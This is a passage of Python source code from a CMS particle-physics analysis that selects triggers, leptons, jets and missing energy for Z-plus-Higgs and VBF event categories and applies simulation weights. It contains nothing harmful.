trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,
event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,
event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])
trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight,
event.HLT_PFMET120_PFMHT120_IDTight,
event.HLT_PFMET130_PFMHT130_IDTight,
event.HLT_PFMET140_PFMHT140_IDTight,
event.HLT_PFMETTypeOne110_PFMHT110_IDTight,
event.HLT_PFMETTypeOne120_PFMHT120_IDTight,
event.HLT_PFMETTypeOne130_PFMHT130_IDTight,
event.HLT_PFMETTypeOne140_PFMHT140_IDTight])
try:
trigger_MET = any([event.HLT_PFMET200_NotCleaned,
event.HLT_PFMET200_HBHECleaned,
event.HLT_PFMET200_HBHE_BeamHaloCleaned,
event.HLT_PFMET250_HBHECleaned])
except:
trigger_MET = None
elif self.year == 2018:
trigger_SingleMu = any([event.HLT_Mu50,
event.HLT_TkMu100,
event.HLT_OldMu100])
trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT
trigger_SingleIsoEle = event.HLT_Ele32_WPTight_Gsf
trigger_SinglePhoton = event.HLT_Photon200
trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,
event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,
event.HLT_PFMETNoMu130_PFMHTNoMu130_IDTight,
event.HLT_PFMETNoMu140_PFMHTNoMu140_IDTight,
event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])
trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight,
event.HLT_PFMET120_PFMHT120_IDTight,
event.HLT_PFMET130_PFMHT130_IDTight,
event.HLT_PFMET140_PFMHT140_IDTight,
event.HLT_PFMETTypeOne110_PFMHT110_IDTight,
event.HLT_PFMETTypeOne120_PFMHT120_IDTight,
event.HLT_PFMETTypeOne130_PFMHT130_IDTight,
event.HLT_PFMETTypeOne140_PFMHT140_IDTight])
trigger_MET = any([event.HLT_PFMET200_NotCleaned,
event.HLT_PFMET200_HBHECleaned,
event.HLT_PFMET200_HBHE_BeamHaloCleaned,
event.HLT_PFMET250_HBHECleaned])
########## Gen Weight #########
if self.isMC:
self.GenWeight = -1. if event.genWeight < 0 else 1.
self.PUWeight = self.puTool.getWeight(event.Pileup_nTrueInt)
self.EventWeight *= self.GenWeight
self.EventWeight *= self.PUWeight
for i,weight in enumerate(event.LHEScaleWeight):
self.out.LHEScaleWeight_hist.Fill(i,weight)
for j,weight in enumerate(event.LHEPdfWeight):
self.out.LHEPdfWeight_hist.Fill(j,weight)
self.LHEScaleWeight = event.LHEScaleWeight
self.LHEPdfWeight = event.LHEPdfWeight
self.LHEWeight_originalXWGTUP = event.LHEWeight_originalXWGTUP
self.out.events.Fill(0.,self.GenWeight)
self.out.original.Fill(0.,event.LHEWeight_originalXWGTUP)
if self.year == 2016 or self.year == 2017:
self.PrefireWeight = event.PrefireWeight
self.PrefireWeightUp = event.PrefireWeight_Up
self.PrefireWeightDown = event.PrefireWeight_Down
if self.isData and event.PV_npvs == 0:
return False
if not self.isData:
self.out.pileup.Fill(event.Pileup_nTrueInt)
if event.Pileup_nTrueInt == 0:
return False
########### FatJet #########
for ifatjet in range(event.nFatJet):
fatjet_pt = event.FatJet_pt[ifatjet]
fatjet_eta = event.FatJet_eta[ifatjet]
fatjet_phi = event.FatJet_phi[ifatjet]
fatjet_mass = event.FatJet_mass[ifatjet]
fatjet_jetid = event.FatJet_jetId[ifatjet]
fatjet_tlv = ROOT.TLorentzVector()
fatjet_tlv.SetPtEtaPhiM(fatjet_pt, fatjet_eta, fatjet_phi, fatjet_mass)
if fatjet_pt > fatjet_pt_cut and abs(fatjet_eta) < fatjet_eta_cut:
fatjet_tlv_list.append(fatjet_tlv)
idx_fatjet.append(ifatjet)
if event.FatJet_tau1[ifatjet]==0:
fatjet_tau21_list.append(0)
fatjet_tau41_list.append(0)
fatjet_tau31_list.append(0)
else:
fatjet_tau21_list.append(event.FatJet_tau2[ifatjet]/event.FatJet_tau1[ifatjet])
fatjet_tau41_list.append(event.FatJet_tau4[ifatjet]/event.FatJet_tau1[ifatjet])
fatjet_tau31_list.append(event.FatJet_tau3[ifatjet]/event.FatJet_tau1[ifatjet])
if event.FatJet_tau2[ifatjet]==0:
fatjet_tau42_list.append(0)
fatjet_tau32_list.append(0)
else:
fatjet_tau42_list.append(event.FatJet_tau4[ifatjet]/event.FatJet_tau2[ifatjet])
fatjet_tau32_list.append(event.FatJet_tau3[ifatjet]/event.FatJet_tau2[ifatjet])
self.nFatJets = len(fatjet_tlv_list)
#stop if no suitable Fatjet
if len(fatjet_tlv_list) == 0:
return False
########### electrons ##########
for ielectron in range(event.nElectron):
electron_pt = event.Electron_pt[ielectron]
electron_eta = event.Electron_eta[ielectron]
electron_phi = event.Electron_phi[ielectron]
electron_mass = event.Electron_mass[ielectron]
electron_tlv = ROOT.TLorentzVector()
electron_tlv.SetPtEtaPhiM(electron_pt,electron_eta,electron_phi,electron_mass)
if electron_eta > -2.5 and electron_eta < -1.479 and electron_phi > -1.55 and electron_phi < -0.9:
if self.Ele_HEM15_16 == -1.:
self.Ele_HEM15_16 = 0.
self.Ele_HEM15_16 += electron_pt
if electron_pt > elec_pt_cut and abs(electron_eta) < elec_eta_cut:
idx_electrons.append(ielectron)
electrons_tlv_list.append(electron_tlv)
if event.Electron_cutBased[ielectron] >= 2:
idx_loose_electrons.append(ielectron)
loose_electrons_tlv_list.append(electron_tlv)
self.nElectrons = len(loose_electrons_tlv_list)
########### muons #########
for imuon in range(event.nMuon):
muon_pt = event.Muon_pt[imuon]
muon_eta = event.Muon_eta[imuon]
muon_phi = event.Muon_phi[imuon]
muon_mass = event.Muon_mass[imuon]
muon_tlv = ROOT.TLorentzVector()
muon_tlv.SetPtEtaPhiM(muon_pt, muon_eta, muon_phi, muon_mass)
if muon_pt > muon_pt_cut and abs(muon_eta) < muon_eta_cut:
idx_muons.append(imuon)
muons_tlv_list.append(muon_tlv)
if event.Muon_isPFcand[imuon] and struct.unpack('B',event.Muon_pfIsoId[imuon])[0]>=2 and (event.Muon_isGlobal[imuon] or event.Muon_isTracker[imuon]):
idx_loose_muons.append(imuon)
loose_muons_tlv_list.append(muon_tlv)
self.nMuons = len(loose_muons_tlv_list)
############ taus #########
for itau in range(event.nTau):
tau_pt = event.Tau_pt[itau]
tau_eta = event.Tau_eta[itau]
tau_phi = event.Tau_phi[itau]
tau_mass = event.Tau_mass[itau]
tau_tlv = ROOT.TLorentzVector()
tau_tlv.SetPtEtaPhiM(tau_pt, tau_eta, tau_phi, tau_mass)
if tau_pt > tau_pt_cut and abs(tau_eta) < tau_eta_cut:
cleanTau = True
for loose_electrons_tlv in loose_electrons_tlv_list:
if loose_electrons_tlv.DeltaR(tau_tlv) < 0.4:
cleanTau = False
for loose_muons_tlv in loose_muons_tlv_list:
if loose_muons_tlv.DeltaR(tau_tlv) < 0.4:
cleanTau = False
if cleanTau:
self.nTaus += 1
############ MET ##########
METx = 0.
METy = 0.
MET_tlv = ROOT.TLorentzVector()
MET_tlv.SetPtEtaPhiE(event.PuppiMET_pt,0.,event.PuppiMET_phi, event.PuppiMET_pt)
############ TTbar pT reweighting ########
if self.isMC and 'TT' in self.sample[0]:
Top1_pt, Top2_pt = getTTPt(event)
self.TopWeight = getTTptWeight(Top1_pt, Top2_pt)
############ ZtoEE ############
self.out.eecutflow.Fill(0.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
maxZpt = -1.
Z_pt = -1.
Z_m = -1.
goodelectronpair = False
for i in idx_electrons:
for j in idx_electrons:
if i==j or event.Electron_charge[i] == event.Electron_charge[j]:
continue
eli_tlv = ROOT.TLorentzVector()
eli_tlv.SetPtEtaPhiM(event.Electron_pt[i],event.Electron_eta[i],event.Electron_phi[i],event.Electron_mass[i])
eli_v = ROOT.TVector3()
eli_v.SetPtEtaPhi(event.Electron_pt[i],event.Electron_eta[i],event.Electron_phi[i])
elj_tlv = ROOT.TLorentzVector()
elj_tlv.SetPtEtaPhiM(event.Electron_pt[j],event.Electron_eta[j],event.Electron_phi[j],event.Electron_mass[j])
elj_v = ROOT.TVector3()
elj_v.SetPtEtaPhi(event.Electron_pt[j],event.Electron_eta[j],event.Electron_phi[j])
diel = eli_tlv + elj_tlv
Z_pt = diel.Pt()
Z_m = diel.M()
if Z_m > 70. and Z_m < 110. and Z_pt > maxZpt:
maxZpt = Z_pt
if eli_tlv.Pt() > elj_tlv.Pt():
el1 = i
el2 = j
el1_tlv = eli_tlv
el2_tlv = elj_tlv
el1_v = eli_v
el2_v = elj_v
else:
el1 = j
el2 = i
el1_tlv = elj_tlv
el2_tlv = eli_tlv
el1_v = elj_v
el2_v = eli_v
goodelectronpair = True
if goodelectronpair:
self.out.eecutflow.Fill(1.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
if el1_tlv.Pt() > elec1_pt_cut and el2_tlv.Pt() > elec2_pt_cut:
self.out.eecutflow.Fill(2.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
if event.Electron_cutBased[el1] >= 2 and event.Electron_cutBased[el2] >= 2:
self.out.eecutflow.Fill(3.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
if maxZpt > v_pt_cut:
self.out.eecutflow.Fill(4.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
if trigger_SingleEle == None:
if not trigger_SingleIsoEle and not trigger_SinglePhoton:
print "ZtoEE trigger inconsistency"
return False
else:
if not trigger_SingleEle and not trigger_SingleIsoEle and not trigger_SinglePhoton:
print "ZtoEE trigger inconsistency"
return False
#if not self.isMC and ("SinglePhoton" in self.sample[0] and (trigger_SingleEle or trigger_SingleIsoEle)):
# print "ZtoEE double counting"
# return False
self.out.eecutflow.Fill(5.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
if self.isMC:
eltrig_tlv = el1_tlv
#for i in range(event.nTrigObj):
# if event.TrigObj_id[i] ==11:
# trigobj_v = ROOT.TVector3()
# trigobj_v.SetPtEtaPhi(event.TrigObj_pt[i],event.TrigObj_eta[i],event.TrigObj_phi[i])
# print "electron TrigObj_filterBits:",event.TrigObj_filterBits[i]
# if event.TrigObj_filterBits[i]==14336:
# #if event.TrigObj_filterBits[i]==1110000000000000:
# print "found matching electron"
# deltaR1 = trigobj_v.DeltaR(el1_v)
# deltaR2 = trigobj_v.DeltaR(el2_v)
# if deltaR2 < deltaR1 and deltaR2 < 0.2:
# eltrig_tlv = el2_tlv
# break
self.TriggerWeight = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta())
self.TriggerWeightUp = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta()) + self.elSFs.getTriggerSFerror(eltrig_tlv.Pt(),eltrig_tlv.Eta())
self.TriggerWeightDown = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta()) - self.elSFs.getTriggerSFerror(eltrig_tlv.Pt(),eltrig_tlv.Eta())
self.LeptonWeight = self.elSFs.getIdIsoSF(el1_tlv.Pt(), el1_tlv.Eta())*self.elSFs.getIdIsoSF(el2_tlv.Pt(),el2_tlv.Eta())
IdIsoSF1 = self.elSFs.getIdIsoSF(el1_tlv.Pt(), el1_tlv.Eta())
IdIsoSF2 = self.elSFs.getIdIsoSF(el2_tlv.Pt(),el2_tlv.Eta())
IdIsoSF1error = self.elSFs.getIdIsoSFerror(el1_tlv.Pt(), el1_tlv.Eta())
IdIsoSF2error = self.elSFs.getIdIsoSFerror(el2_tlv.Pt(),el2_tlv.Eta())
self.LeptonWeight = IdIsoSF1*IdIsoSF2
LeptonWeightsigma = np.sqrt((IdIsoSF1error*IdIsoSF2)**2+(IdIsoSF2error*IdIsoSF1)**2)
self.LeptonWeightUp = self.LeptonWeight + LeptonWeightsigma
self.LeptonWeightDown = self.LeptonWeight - LeptonWeightsigma
if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:
GenVpt = getGenVpt(event)
self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)
self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)
self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)
self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr
self.EventWeight *= self.TriggerWeight
self.EventWeight *= self.LeptonWeight
V = el1_tlv + el2_tlv
self.Ele1_pt = el1_tlv.Pt()
self.Ele1_eta = el1_tlv.Eta()
self.Ele1_phi = el1_tlv.Phi()
self.Ele1_mass = el1_tlv.M()
self.Ele2_pt = el2_tlv.Pt()
self.Ele2_eta = el2_tlv.Eta()
self.Ele2_phi = el2_tlv.Phi()
self.Ele2_mass = el2_tlv.M()
self.isZtoEE = True
########## ZtoMM #############
self.out.mmcutflow.Fill(0.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
maxZpt = -1.
Z_pt = -1.
Z_m = -1.
goodmuonpair = False
for i in idx_muons:
for j in idx_muons:
if i==j or event.Muon_charge[i] == event.Muon_charge[j]:
continue
mui_tlv = ROOT.TLorentzVector()
mui_tlv.SetPtEtaPhiM(event.Muon_pt[i],event.Muon_eta[i],event.Muon_phi[i],event.Muon_mass[i])
mui_v = ROOT.TVector3()
mui_v.SetPtEtaPhi(event.Muon_pt[i],event.Muon_eta[i],event.Muon_phi[i])
muj_tlv = ROOT.TLorentzVector()
muj_tlv.SetPtEtaPhiM(event.Muon_pt[j],event.Muon_eta[j],event.Muon_phi[j],event.Muon_mass[j])
muj_v = ROOT.TVector3()
muj_v.SetPtEtaPhi(event.Muon_pt[j],event.Muon_eta[j],event.Muon_phi[j])
dimu = mui_tlv + muj_tlv
Z_pt = dimu.Pt()
Z_m = dimu.M()
if Z_m > 70. and Z_m < 110. and Z_pt > maxZpt:
maxZpt = Z_pt
if mui_tlv.Pt() > muj_tlv.Pt():
mu1 = i
mu2 = j
mu1_tlv = mui_tlv
mu2_tlv = muj_tlv
mu1_v = mui_v
mu2_v = muj_v
else:
mu1 = j
mu2 = i
mu1_tlv = muj_tlv
mu2_tlv = mui_tlv
mu1_v = muj_v
mu2_v = mui_v
goodmuonpair = True
if goodmuonpair:
self.out.mmcutflow.Fill(1.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
mu1_highPtId = struct.unpack('B',event.Muon_highPtId[mu1])[0]
mu2_highPtId = struct.unpack('B',event.Muon_highPtId[mu2])[0]
if mu1_tlv.Pt() > muon1_pt_cut and mu2_tlv.Pt() > muon2_pt_cut:
self.out.mmcutflow.Fill(2.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
if (mu1_highPtId >= 2 and mu2_highPtId >= 1) or (mu1_highPtId >= 1 and mu2_highPtId >= 2):
self.out.mmcutflow.Fill(3.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
if maxZpt > v_pt_cut:
self.out.mmcutflow.Fill(4.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
if not trigger_SingleMu:
print "ZtoMM trigger inconsistency"
return False
self.out.mmcutflow.Fill(5.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
if self.isMC:
if mu1_highPtId >=2:
mutrig_tlv = mu1_tlv
else:
mutrig_tlv = mu2_tlv
#for i in range(event.nTrigObj):
# if event.TrigObj_id[i] ==13:
# trigobj_v = ROOT.TVector3()
# trigobj_v.SetPtEtaPhi(event.TrigObj_pt[i],event.TrigObj_eta[i],event.TrigObj_phi[i])
# deltaR1 = trigobj_v.DeltaR(mu1_v)
# deltaR2 = trigobj_v.DeltaR(mu2_v)
# print "muon TrigObj_filterBits:",event.TrigObj_filterBits[i]
# if event.TrigObj_filterBits[i]==2048:
# #if event.TrigObj_filterBits[i]==10000000000:
# print "found matching muon"
# if deltaR2 < deltaR1 and deltaR2 < 0.2:
# mutrig_tlv = mu2_tlv
# break
self.TriggerWeight = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta())
self.TriggerWeightUp = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta()) + self.muSFs.getTriggerSFerror(mutrig_tlv.Pt(),mutrig_tlv.Eta())
self.TriggerWeightDown = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta()) - self.muSFs.getTriggerSFerror(mutrig_tlv.Pt(),mutrig_tlv.Eta())
IdSF1 = self.muSFs.getIdSF(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)
IdSF2 = self.muSFs.getIdSF(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)
IsoSF1 = self.muSFs.getIsoSF(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)
IsoSF2 = self.muSFs.getIsoSF(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)
IdSF1error = self.muSFs.getIdSFerror(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)
IdSF2error = self.muSFs.getIdSFerror(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)
IsoSF1error = self.muSFs.getIsoSFerror(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)
IsoSF2error = self.muSFs.getIsoSFerror(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)
self.LeptonWeight = IdSF1*IdSF2*IsoSF1*IsoSF2
LeptonWeightsigma = np.sqrt((IdSF1error*IdSF2*IsoSF1*IsoSF2)**2+(IdSF2error*IdSF1*IsoSF1*IsoSF2)**2+(IsoSF1error*IdSF1*IdSF2*IsoSF2)**2+(IsoSF2error*IdSF1*IdSF2*IsoSF1)**2)
self.LeptonWeightUp = self.LeptonWeight + LeptonWeightsigma
self.LeptonWeightDown = self.LeptonWeight - LeptonWeightsigma
if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:
GenVpt = getGenVpt(event)
self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)
self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)
self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)
self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr
self.EventWeight *= self.TriggerWeight
self.EventWeight *= self.LeptonWeight
if mu1_tlv.DeltaR(mu2_tlv) < 0.3:
try:
self.Mu1_relIso = ((event.Muon_tkRelIso[mu1]*mu1_tlv.Pt()) - mu2_tlv.Pt())/mu1_tlv.Pt()
self.Mu2_relIso = ((event.Muon_tkRelIso[mu2]*mu2_tlv.Pt()) - mu1_tlv.Pt())/mu2_tlv.Pt()
except:
self.Mu1_relIso = -1.
self.Mu2_relIso = -1.
else:
try:
self.Mu1_relIso = event.Muon_tkRelIso[mu1]
self.Mu2_relIso = event.Muon_tkRelIso[mu2]
except:
self.Mu1_relIso = -1.
self.Mu2_relIso = -1.
V = mu1_tlv + mu2_tlv
self.Mu1_pt = mu1_tlv.Pt()
self.Mu1_eta = mu1_tlv.Eta()
self.Mu1_phi = mu1_tlv.Phi()
self.Mu1_mass = mu1_tlv.M()
self.Mu1_pfIsoId = struct.unpack('B',event.Muon_pfIsoId[mu1])[0]
self.Mu1_highPtId = struct.unpack('B',event.Muon_highPtId[mu1])[0]
self.Mu2_pt = mu2_tlv.Pt()
self.Mu2_eta = mu2_tlv.Eta()
self.Mu2_phi = mu2_tlv.Phi()
self.Mu2_mass = mu2_tlv.M()
self.Mu2_pfIsoId = struct.unpack('B',event.Muon_pfIsoId[mu2])[0]
self.Mu2_highPtId = struct.unpack('B',event.Muon_highPtId[mu2])[0]
self.isZtoMM = True
########### TtoEM #########
if not self.isZtoMM and not self.isZtoEE and self.nElectrons == 1 and self.nMuons == 1:
if event.Electron_charge[idx_loose_electrons[0]] != event.Muon_charge[idx_loose_muons[0]]:
el_tlv = loose_electrons_tlv_list[0]
mu_tlv = loose_muons_tlv_list[0]
if mu_tlv.Pt() > 30. and el_tlv.Pt() > 30.:
V = mu_tlv + el_tlv
if V.Pt() > 50.:
if trigger_SingleEle == None:
if not trigger_SingleIsoEle:
print "TtoEM trigger inconsistency"
return False
else:
if not trigger_SingleEle and not trigger_SingleIsoEle:
print "TtoEM trigger inconsistency"
return False
if self.isMC:
self.TriggerWeight = self.elSFs.getTriggerSF(el_tlv.Pt(),el_tlv.Eta())
self.LeptonWeight = self.elSFs.getIdIsoSF(el_tlv.Pt(), el_tlv.Eta())
if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:
GenVpt = getGenVpt(event)
self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)
self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)
self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)
self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr
self.EventWeight *= self.TriggerWeight
self.EventWeight *= self.LeptonWeight
self.Mu1_pt = mu_tlv.Pt()
self.Mu1_eta = mu_tlv.Eta()
self.Mu1_phi = mu_tlv.Phi()
self.Mu1_mass = mu_tlv.M()
self.Ele1_pt = el_tlv.Pt()
self.Ele1_eta = el_tlv.Eta()
self.Ele1_phi = el_tlv.Phi()
self.Ele1_mass = el_tlv.M()
self.isTtoEM = True
######### ZtoNN ##########
self.out.nncutflow.Fill(0.,self.EventWeight)
nncutflow_list.append(self.EventWeight)
if not self.isZtoMM and not self.isZtoEE and not self.isTtoEM:
if event.PuppiMET_pt > met_pt_cut :
self.out.nncutflow.Fill(1.,self.EventWeight)
nncutflow_list.append(self.EventWeight)
if self.nElectrons == 0 and self.nMuons == 0 and self.nTaus == 0:
self.out.nncutflow.Fill(2.,self.EventWeight)
nncutflow_list.append(self.EventWeight)
V.SetPtEtaPhiE(event.PuppiMET_pt,0.,event.PuppiMET_phi,event.PuppiMET_pt)
V_chs.SetPtEtaPhiE(event.MET_pt,0.,event.MET_phi,event.MET_pt)
if trigger_MET == None:
if not self.isMC and not trigger_METMHT and not trigger_METMHTNoMu:
print "ZtoNN Trigger inconsistency"
return False
else:
if not self.isMC and not trigger_MET and not trigger_METMHT and not trigger_METMHTNoMu:
print "ZtoNN Trigger inconsistency"
return False
self.out.nncutflow.Fill(3.,self.EventWeight)
nncutflow_list.append(self.EventWeight)
if self.filter(event) == False:
print "Bad event"
return False
self.out.nncutflow.Fill(4.,self.EventWeight)
nncutflow_list.append(self.EventWeight)
if self.isMC:
if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:
GenVpt = getGenVpt(event)
self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)
self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)
self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)
self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr
self.TriggerWeight = 1.
self.isZtoNN = True
#stop if no semileptonic decays
if self.isZtoEE==False and self.isZtoMM==False and self.isZtoNN==False and self.isTtoEM==False:
return False
########## setting the Higgs and V index #######
fatjet_idx_H = 0
valid_Higgs = False
if self.isZtoMM:
fatjet_maxpt = 0.
for i,fatjet_tlv in enumerate(fatjet_tlv_list):
if fatjet_tlv.DeltaR(mu1_tlv)>0.8 and fatjet_tlv.DeltaR(mu2_tlv)>0.8 and fatjet_tlv.Pt()>fatjet_maxpt:
fatjet_maxpt=fatjet_tlv.Pt()
fatjet_idx_H = i
valid_Higgs = True
if not valid_Higgs:
return False
elif self.isZtoEE:
fatjet_maxpt = 0.
for i,fatjet_tlv in enumerate(fatjet_tlv_list):
if fatjet_tlv.DeltaR(el1_tlv)>0.8 and fatjet_tlv.DeltaR(el2_tlv)>0.8 and fatjet_tlv.Pt()>fatjet_maxpt:
fatjet_maxpt=fatjet_tlv.Pt()
fatjet_idx_H = i
valid_Higgs = True
if not valid_Higgs:
return False
elif self.isZtoNN:
fatjet_maxpt = 0.
for i,fatjet_tlv in enumerate(fatjet_tlv_list):
if fatjet_tlv.Pt()>fatjet_maxpt:
fatjet_maxpt=fatjet_tlv.Pt()
fatjet_idx_H = i
############ AK4 Jet ###########
for ijet in range(event.nJet):
jet_pt = event.Jet_pt[ijet]
jet_eta = event.Jet_eta[ijet]
jet_phi = event.Jet_phi[ijet]
jet_mass = event.Jet_mass[ijet]
jet_tlv = ROOT.TLorentzVector()
jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)
self.HT += jet_pt
if jet_eta > -2.5 and jet_eta < -1.479 and jet_phi > -1.55 and jet_phi < -0.9:
if self.HT_HEM15_16 == -1.:
self.HT_HEM15_16 = 0.
self.HT_HEM15_16 += jet_pt
if jet_pt > ak4_pt_cut and abs(jet_eta) < ak4_eta_cut:
cleanJet = True
for loose_electrons_tlv in loose_electrons_tlv_list:
if loose_electrons_tlv.DeltaR(jet_tlv) < 0.4:
cleanJet = False
for loose_muons_tlv in loose_muons_tlv_list:
if loose_muons_tlv.DeltaR(jet_tlv) < 0.4:
cleanJet = False
if cleanJet and getJetID(self.year,event,ijet):
if len(fatjet_tlv_list) > 0 and fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv) > 1.2:
jet_tlv_list.append(jet_tlv)
idx_jet.append(ijet)
############ AK4 Jet check for VBF ###########
if self.isZtoMM:
lep1_tlv = mu1_tlv
lep2_tlv = mu2_tlv
if self.isZtoEE:
lep1_tlv = el1_tlv
lep2_tlv = el2_tlv
for ijet in range(event.nJet):
jet_pt = event.Jet_pt[ijet]
jet_eta = event.Jet_eta[ijet]
jet_phi = event.Jet_phi[ijet]
jet_mass = event.Jet_mass[ijet]
jet_tlv = ROOT.TLorentzVector()
jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)
if abs(jet_eta) < 5.0:
if len(fatjet_tlv_list) > 0:
if fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv) > 1.2:
if getJetID(self.year,event,ijet) and event.Jet_puId[ijet]==7:
if self.isZtoMM or self.isZtoEE:
if jet_tlv.DeltaR(lep1_tlv)>0.4 and jet_tlv.DeltaR(lep2_tlv)>0.4:
jet_tlv_list_vbf.append(jet_tlv)
idx_jet_vbf.append(ijet)
elif self.isZtoNN:
jet_tlv_list_vbf.append(jet_tlv)
idx_jet_vbf.append(ijet)
idx1_vbf = -1
idx2_vbf = -1
maxVBFmass = -1.
for ijet1, jet1_tlv in enumerate(jet_tlv_list_vbf):
for ijet2, jet2_tlv in enumerate(jet_tlv_list_vbf):
if ijet1 == ijet2: continue
eta1 = jet_tlv_list_vbf[ijet1].Eta()
eta2 = jet_tlv_list_vbf[ijet2].Eta()
V_VBF = jet_tlv_list_vbf[ijet1]+jet_tlv_list_vbf[ijet2]
VBFmass = V_VBF.M()
if abs(eta1-eta2)>4.0 and eta1*eta2<0. and VBFmass>maxVBFmass:
idx1_vbf = ijet1
idx2_vbf = ijet2
maxVBFmass = VBFmass
self.dijet_VBF_mass = maxVBFmass
if maxVBFmass > 500.:
self.isVBF = True
self.Jet1_VBF_pt = jet_tlv_list_vbf[idx1_vbf].Pt()
self.Jet1_VBF_eta = jet_tlv_list_vbf[idx1_vbf].Eta()
self.Jet1_VBF_phi = jet_tlv_list_vbf[idx1_vbf].Phi()
self.Jet1_VBF_mass = jet_tlv_list_vbf[idx1_vbf].M()
self.Jet2_VBF_pt = jet_tlv_list_vbf[idx2_vbf].Pt()
self.Jet2_VBF_eta = jet_tlv_list_vbf[idx2_vbf].Eta()
self.Jet2_VBF_phi = jet_tlv_list_vbf[idx2_vbf].Phi()
self.Jet2_VBF_mass = jet_tlv_list_vbf[idx2_vbf].M()
self.deltaR_VBF = jet_tlv_list_vbf[idx1_vbf].DeltaR(jet_tlv_list_vbf[idx2_vbf])
self.deltaR_HVBFjet1 = (fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv_list_vbf[idx1_vbf]))
self.deltaR_HVBFjet2 = (fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv_list_vbf[idx2_vbf]))
########## Higgs ########
H = fatjet_tlv_list[fatjet_idx_H]
if self.runJEC:
self.H_mass_nom = event.FatJet_msoftdrop_nom[fatjet_idx_H]
self.H_mass_jmsUp = event.FatJet_msoftdrop_jmsUp[fatjet_idx_H]
self.H_mass_jmsDown = event.FatJet_msoftdrop_jmsDown[fatjet_idx_H]
self.H_mass_jmrUp = event.FatJet_msoftdrop_jmrUp[fatjet_idx_H]
self.H_mass_jmrDown = event.FatJet_msoftdrop_jmrDown[fatjet_idx_H]
self.H_pt_nom = event.FatJet_pt_nom[fatjet_idx_H]
self.H_pt_jesUp = event.FatJet_pt_jesTotalUp[fatjet_idx_H]
self.H_pt_jesDown = event.FatJet_pt_jesTotalDown[fatjet_idx_H]
self.H_pt_jerUp = event.FatJet_pt_jerUp[fatjet_idx_H]
self.H_pt_jerDown = event.FatJet_pt_jerDown[fatjet_idx_H]
self.PuppiMET_pt_nom = event.PuppiMET_pt_nom
self.PuppiMET_pt_jesUp = event.PuppiMET_pt_jesTotalUp
self.PuppiMET_pt_jesDown = event.PuppiMET_pt_jesTotalDown
self.PuppiMET_pt_jerUp = event.PuppiMET_pt_jerUp
self.PuppiMET_pt_jerDown = event.PuppiMET_pt_jerDown
H_Eta = H.Eta()
